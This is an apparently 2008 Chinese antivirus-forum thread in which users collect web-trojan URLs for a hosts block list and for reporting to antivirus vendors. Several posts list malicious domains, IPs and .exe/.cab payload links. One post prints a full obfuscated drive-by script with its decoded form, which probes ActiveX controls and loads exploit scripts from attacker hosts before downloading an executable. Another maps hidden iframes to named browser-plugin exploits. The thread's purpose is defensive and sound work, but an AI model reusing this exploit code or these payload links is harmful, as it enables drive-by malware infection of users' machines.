样本区活动第一波----网马地址大侦缉

lanvin

为了更好的维护网络安全，样本区将开展一系列的活动，也期待广大网友积极参加。

第一波---网马地址大侦缉
活动时间2008年11月13日起-
活动细则及奖励---很简单，有效的网马链接即可得分，起评分5个经验值，多量多加，新链接或malicious domain多加恶意拷贝链接者只得起评分

最后将由祥子制作成相关的host文件

本活动旨在维护网络安全，所有可疑样本和链接将由热心的卡饭上报给反病毒研究厂商和机构，卡饭样本区对样本和网马概不负责

[ 本帖最后由 lanvin 于 2008-11-13 11:37 编辑 ]

qianwenxiang

Copy MDL上的URL是否加分

[ 本帖最后由 lanvin 于 2008-11-13 11:39 编辑 ]

lanvin

原帖由 qianwenxiang 于 2008-11-13 11:33 发表
Copy MDL上的URL是否加分

晕 不小心点成编辑了

只加起评分

baerzake

支持一下

qianwenxiang

>http://zlwrnm8.cn/fxx.htm
>http://zlwrnm9.cn/fxx.htm
>http://zlwrnm10.cn/fxx.htm
>http://zlwrnm11.cn/fxx.htm
>http://zlwrnm12.cn/fxx.htm
>http://zlwrnm13.cn/fxx.htm
>http://zlwrnm14.cn/fxx.htm
>http://zlwrnm15.cn/fxx.htm
>http://zlwrnm16.cn/fxx.htm
>http://zlwrnm17.cn/fxx.htm
>http://zlwrnm18.cn/fxx.htm
==============
http://200.122.168.229/dl/lucky1 ... =215462&RTGURL=
http://www.wq9q.cn/root/svcos.exe  
http://web.gd3w.cn/root/baidu.cab
http://facaizhifuok.cn/root/svcos.exe
http://wm.eo2q.cn/root/top.css  
http://down.inkjsx.cn/new/a76.css
http://www.oiuytr.net/new/a6.css

我先来几个

jack518

http://cc.zuiyige.net/wmwm/new.htm<iframe src=http://cc.zuiyige.net/wmwm/new.htm width=0 height=0></iframe><script language="javascript" type="text/javascript" src="http://js.users.51.la/1724160.js"></script>



<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1e x(){3.b()}1f.1b=x;5(3.D.1h(\'A\')==-1){9{2 e;2 o=(3.1t("4"));o.1l("L","1m:S-T-R-Q-O");2 P=o.V("11.Z","")}a(e){};7{2 d=8 N();d.W(d.X()+12*w*w*G);3.D=\'A=F;E=/;d=\'+d.M();5(e!="[4 6]"){3.b("<c l=n:\\/\\/s.p.r\\/q\\/H.t><\\/c>")}K{9{2 f;2 J=8 k("B.B.1")}a(f){};7{5(f!="[4 6]"){3.b("<c l=n:\\/\\/s.p.r\\/q\\/Y.t><\\/c>")}}9{2 g;2 1v=8 k("1n.13")}a(g){};7{5(g!="[4 6]"){3.b("<c l=n:\\/\\/s.p.r\\/q\\/1u.t><\\/c>")}}9{2 h;2 1q=8 k("1r.1i.1")}a(h){};7{5(h!="[4 6]"){3.b("<m u=\'10\'z=\'10\'l=\'18.C\'></m>")}}9{2 i;2 19=8 k("17.16 14 15 1a.1")}a(i){};7{5(i!="[4 6]"){3.b("<m u=\'10\'z=\'10\'l=\'1c.C\'></m>")}}9{2 j;2 v=8 k("I.1d")}a(j){};7{5(j!="[4 6]"){v.1g("n://1s.1p.1o/1k/y.1j","y.U",0)}}}}}',62,94,'||var|document|object|if|Error|finally|new|try|catch|write|script|expires|||||||ActiveXObject|src|iframe|http|ado|zuiyige|wmwm|net|cc|js|width|obj|60|init|abd|height|setcookie|IERPCtl|htm|cookie|path|newckie|1000|a014|BaiduBar|reals|else|classid|toGMTString|Date|00C04FC29E36|as|983A|11D0|BD96C556|65A3|exe|createobject|setTime|getTime|arl|Stream||Adodb|24|StormPlayer|RAM|Download|RealPlayer|rmocx|alz|newsreal|Handler|onload|anrl|Tool|function|window|DloadDS|indexOf|GLChatCtrl|cab|mmuu|setAttribute|clsid|MPS|com|tianxiayouzei|Lz|GLCHAT|dd|createElement|abf|storm'.split('|'),0,{}))



function init(){document.write()}window.onload=init;if(document.cookie.indexOf('setcookie')==-1){try{var e;var ado=(document.createElement("object"));ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var as=ado.createobject("Adodb.Stream","")}catch(e){};finally{var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='setcookie=newckie;path=/;expires='+expires.toGMTString();if(e!="[object Error]"){document.write("<script src=http:\/\/cc.zuiyige.net\/wmwm\/a014.js><\/script>")}else{try{var f;var reals=new ActiveXObject("IERPCtl.IERPCtl.1")}catch(f){};finally{if(f!="[object Error]"){document.write("<script src=http:\/\/cc.zuiyige.net\/wmwm\/arl.js><\/script>")}}try{var g;var storm=new ActiveXObject("MPS.StormPlayer")}catch(g){};finally{if(g!="[object Error]"){document.write("<script src=http:\/\/cc.zuiyige.net\/wmwm\/abf.js><\/script>")}}try{var h;var Lz=new ActiveXObject("GLCHAT.GLChatCtrl.1")}catch(h){};finally{if(h!="[object Error]"){document.write("<iframe width='10'height='10'src='alz.htm'></iframe>")}}try{var i;var newsreal=new ActiveXObject("rmocx.RealPlayer RAM Download Handler.1")}catch(i){};finally{if(i!="[object Error]"){document.write("<iframe width='10'height='10'src='anrl.htm'></iframe>")}}try{var j;var obj=new ActiveXObject("BaiduBar.Tool")}catch(j){};finally{if(j!="[object Error]"){obj.DloadDS("http://dd.tianxiayouzei.com/mmuu/abd.cab","abd.exe",0)}}}}}

</script>

taoyuan237

这个TXT里不是黄网就是被挂了马的。可能有的已经实效了但我测的时候大多还是可以上而且有马的

jack518

<HTML>
<script src=http://218.75.91.248/ww/nick.js></script>
</HTML>
<iframe src="http://218.75.91.248/ww/ww1.htm" width="20" height="0" frameborder="0"></iframe>
<iframe src="http://218.75.91.248/ww/ww2.htm" width="20" height="0" frameborder="0"></iframe>
<iframe src="http://218.75.91.248/ww/ww3.htm" width="20" height="0" frameborder="0"></iframe>
<iframe src="http://218.75.91.248/ww/ww4.htm" width="20" height="0" frameborder="0"></iframe>
<iframe src="http://218.75.91.248/ww/ww5.htm" width="20" height="0" frameborder="0"></iframe>
<iframe src="http://218.75.91.248/ww/ww6.htm" width="20" height="0" frameborder="0"></iframe>
<iframe src="http://218.75.91.248/ww/vip.htm" width="20" height="0" frameborder="0"></iframe>http://218.75.91.248/ww/ww1.htm==http://218.75.91.248/ww/614.js
http://218.75.91.248/ww/ww1.htm==http://218.75.91.248/window.cab(baidu溢出)
http://218.75.91.248/ww/ww3.htm==http://218.75.91.248/ww/webxl.js
http://218.75.91.248/ww/ww4.htm==http://ddd.369678.cn/window.exe(MS06014溢出)
http://218.75.91.248/ww/ww5.htm==http://218.75.91.248/ww/bb.js
http://218.75.91.248/ww/ww6.htm==http://218.75.91.248/window.exe(Yahoo! Messenger溢出 clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F)，
http://218.75.91.248/ww/ww6.htm==http://218.75.91.248/window.exe(EDraw Office Viewer Component 5.1 HttpDownloadFile() Insecure Method溢出 clsid:6BA21C22-53A5-463F-BBE8-5CF7FFA0132B)
http://218.75.91.248/ww/vip.htm==http://218.75.91.248/window.cab (CLSID:19EFFC12-25FB-479A-A0F2-1569AE1B3365)

冷冷

http://www.zghncsi.cn/one/a38.htm
-->http://zlwrnm18.cn/a132/fxx.htm
-->http://zlwrnm18.cn/a132/fx.htm
-->http://zlwrnm18.cn/a132/ss.html
-->http://zlwrnm18.cn/a132/MS06014.htm
-->http://zlwrnm17.cn/UU.htm
-->http://zlwrnm18.cn/a132/real.htm
-->http://zlwrnm18.cn/a132/ilink.html
-->http://zlwrnm18.cn/a132/i115.swf

url1=http://61.164.118.209/new/new1.exe
url2=http://61.164.118.209/new/new2.exe
url3=http://61.164.118.209/new/new3.exe
url4=http://61.164.118.209/new/new4.exe
url5=http://61.164.118.209/new/new5.exe
url6=http://61.164.118.211/new/new6.exe
url7=http://61.164.118.211/new/new7.exe
url8=http://61.164.118.211/new/new8.exe
url9=http://61.164.118.211/new/new9.exe
url10=http://61.164.118.211/new/new10.exe
url11=http://61.160.210.43/new/new11.exe
url12=http://61.160.210.43/new/new12.exe
url13=http://61.160.210.43/new/new13.exe
url14=http://61.160.210.43/new/new14.exe
url15=http://61.160.210.43/new/new15.exe
url16=http://61.160.210.43/new/new16.exe
url17=http://61.160.210.44/new/new17.exe
url18=http://61.160.210.44/new/new18.exe
url19=http://61.160.210.44/new/new19.exe
url20=http://61.160.210.44/new/new20.exe
url21=http://61.160.210.42/new/new21.exe
url22=http://61.160.210.42/new/new22.exe
url23=http://61.160.210.42/new/new23.exe
url24=http://61.160.210.42/new/new24.exe
url25=http://61.160.210.42/new/new25.exe
url26=http://61.160.210.42/new/new26.exe
url27=http://61.160.210.41/new/new27.exe
url28=http://61.160.210.41/new/new28.exe
url29=http://61.160.210.41/new/new29.exe
url30=http://61.160.210.41/new/new30.exe
url31=http://61.160.210.46/new/new31.exe
url32=http://61.160.210.46/new/new32.exe
url33=http://61.160.210.46/new/new33.exe
url34=http://61.160.210.46/new/new34.exe
url35=http://61.160.210.46/new/new35.exe

change_018

支持支持，这个Hosts小不了